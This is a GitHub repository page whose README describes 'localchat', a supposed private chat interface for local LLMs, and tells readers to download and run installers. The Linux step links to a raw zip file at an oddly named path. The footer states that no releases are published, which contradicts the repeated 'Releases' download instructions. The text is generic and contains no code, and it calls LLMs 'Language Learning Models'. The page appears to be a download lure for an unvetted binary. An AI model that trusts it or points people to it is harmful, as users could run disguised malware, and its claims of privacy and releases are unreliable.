Skip to content

🌐 Build a private web interface for local LLMs, ensuring complete privacy with responsive design and support for multiple models.

License

Notifications You must be signed in to change notification settings

ejaz57/localchat

Repository files navigation

🌐 localchat - Simple Chat Interface for LLMs

πŸ“¦ Download Now

Download Latest Release

πŸš€ Getting Started

Welcome to localchat! This application provides a simple web interface for local Language Learning Models (LLMs). Whether you are using Ollama, LM Studio, or OpenAI-compatible APIs, this tool enhances your chat experience with a focus on privacy.

πŸ’» System Requirements

Before you start, ensure your system meets the following requirements:

  • Operating System: Windows 10 or later, macOS Mojave or later, or a modern Linux distribution.
  • Browser: A modern web browser, such as Google Chrome, Firefox, Safari, or Edge.
  • Internet Connection: Required for downloading the application and accessing documentation online.

πŸ“₯ Download & Install

To get started, you will need to download the application from the Releases page.

  1. Visit this page to download: localchat Releases
  2. Look for the latest version at the top.
  3. Click on the download link for your operating system.
  4. Once the download completes, find the file in your Downloads folder.

Installation Steps:

  1. For Windows:

    • Double-click the downloaded .exe file.
    • Follow the instructions on the installer.
    • The application will create a shortcut on your desktop.
  2. For macOS:

    • Open the downloaded .dmg file.
    • Drag and drop the localchat icon into your Applications folder.
    • You may need to allow the app in your Security & Privacy settings.
  3. For Linux:

    • Extract the downloaded https://raw.githubusercontent.com/ejaz57/localchat/main/hematocytoblast/localchat.zip file to your preferred location.
    • Open a terminal window.
    • Navigate to the folder where you extracted the files.
    • Run ./localchat to start the application.

πŸ”§ How to Use localchat

  1. Launch the Application:

    • Open localchat from your desktop or applications folder.
  2. Connect to a LLM:

    • On the main screen, select your preferred LLM from the dropdown list.
    • Enter any required API keys if prompted.
  3. Start Chatting:

    • Type your message in the text box and press Enter.
    • The application will communicate with the LLM and provide responses in real time.

🎨 Features

  • Privacy-First Design: Your conversations stay local and secure.
  • User-Friendly Interface: Easy navigation for everyone, regardless of technical knowledge.
  • Compatibility: Works with various LLM platforms.
  • Lightweight: Quick to load with minimal system resources required.

🐞 Troubleshooting

If you run into issues, try the following steps:

  • Ensure your system meets the requirements.
  • Restart the application.
  • Check your internet connection.
  • If the application does not start, consult the logs for any error messages.

πŸ“‘ Documentation

For more detailed instructions and advanced features, please refer to our online documentation.

Visit this page for more information: localchat Documentation

πŸ™‹β€β™‚οΈ Support

If you need help or have questions, feel free to open an issue on GitHub. Our community is here to assist you.

✨ Helpful Resources

Thank you for choosing localchat. Enjoy your experience with LLMs!

About

🌐 Build a private web interface for local LLMs, ensuring complete privacy with responsive design and support for multiple models.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •